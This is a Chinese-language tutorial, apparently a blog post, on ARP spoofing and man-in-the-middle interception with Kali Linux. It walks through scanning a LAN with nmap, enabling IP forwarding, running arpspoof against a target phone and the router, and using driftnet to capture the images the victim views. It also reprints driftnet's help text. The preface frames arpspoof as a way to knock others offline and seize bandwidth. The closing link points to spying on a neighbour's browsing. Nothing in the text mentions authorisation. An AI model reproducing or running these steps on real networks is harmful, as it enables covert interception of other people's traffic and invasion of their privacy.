关于 arpspoof欺骗与MITM(中间人攻击)测试

前言:

Arpspoof是一个截发包工具,能够用来进行局域网内部的欺骗,方便用户开启arp断网攻击,抢占网速。

Driftnet是一款简单而使用的图片捕获工具,可以很方便的在网络数据包中抓取图片。该工具可以实时和离线捕获指定数据包中是图片,当然在kali里是有的。

1,使用nmap扫描该网段存活主机

# nmap -sP 192.168.1.100/24

Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-15 22:18 UTC

Nmap scan report for 192.168.1.1

Host is up (0.0089s latency).

MAC Address: D8:15:0D:EF:57:D6 (Tp-link Technologies)

Nmap scan report for 192.168.1.100

Host is up (0.0040s latency).

MAC Address: 8C:F2:28:AA:CE:23 (Shenzhen Mercury Communication Technologies)

Nmap scan report for 192.168.1.102

Host is up (0.032s latency).

MAC Address: 04:15:52:12:69:8F (Apple)

Nmap scan report for 192.168.1.104

Host is up (0.12s latency).

MAC Address: 60:F8:1D:8A:15:DB (Apple)

Nmap scan report for 192.168.1.111

Host is up (0.024s latency).

MAC Address: 50:7A:55:2A:33:15 (Apple)

Nmap scan report for 192.168.1.114

Host is up (0.23s latency).

MAC Address: 9C:99:A0:48:99:51 (Xiaomi Communications)

Nmap scan report for 192.168.1.116

Host is up (0.10s latency).

MAC Address: 54:E4:3A:E0:FA:78 (Apple)

Nmap scan report for 192.168.1.118

Host is up (0.017s latency).

MAC Address: 2A:F7:6A:40:4D:78 (Unknown)

Nmap scan report for 192.168.1.123

Host is up.

Nmap done: 256 IP addresses (9 hosts up) scanned in 6.07 seconds

2,在kali系统开启路由转发功能

# echo  "1"> /proc/sys/net/ipv4/ip_forward

3,找到要嗅探的手机ip,进行arp欺骗。将主机192.168.1.106发送给192.168.1.1的数据包先发送给kali主机,再由主机转发。

# arpspoof  -i wlan0   -t 192.168.1.106  192.168.1.1

4,将路由器发回给192.168.1.106主机的数据包先发给kali主机,再由本机转发。

# arpspoof  -i wlan0  -t 192.168.1.1  192.168.1.106

5,使用dirftnet进程监控,然后会弹出一个监控框,接着在手机上浏览网页,就会显示出目标主机浏览的图片。

# driftnet  -i  wlan0

2016-05-15-22-50-58

/tmp/drifnet-UIsrmU 默认的图片都会保存在该位置。

# driftnet  -help 查看dirftnet相关参数

driftnet, version 1.1.5

Capture images from network traffic and display them in an X window.

Synopsis: driftnet [options] [filter code]

Options:

-h               Display this help message.

-v               Verbose operation.

-b               Beep when a new image is captured.

-i interface     Select the interface on which to listen (default: allinterfaces).

-f file          Instead of listening on an interface, read captured

packets from a pcap dump file; file can be a named pipe for use with Kismet or similar.

-p               Do not put the listening interface into promiscuous mode.

-a               Adjunct mode: do not display images on screen, but save

them to a temporary directory and announce their names on

standard output.

-m number        Maximum number of images to keep in temporary directory in adjunct mode.

-d directory     Use the named temporary directory.

-x prefix        Prefix to use when saving images.

-s               Attempt to extract streamed audio data from the network,

in addition to images. At present this supports MPEG data

only.

-S               Extract streamed audio but not images.

-M command       Use the given command to play MPEG audio data extracted

with the -s option; this should process MPEG frames

supplied on standard input. Default: `mpg123 -'.

Sun May 15 22:21:36 2016 [driftnet]

warning: image data too small (49 bytes) to bother with,图片字节数小于49将不会显示。

更多内容请参考: http://null-byte.wonderhowto.com/how-to/hack-like-pro-use-driftnet-see-what-kind-images-your-neighbor-looks-online-0154253/


发表评论

登录 后发表评论.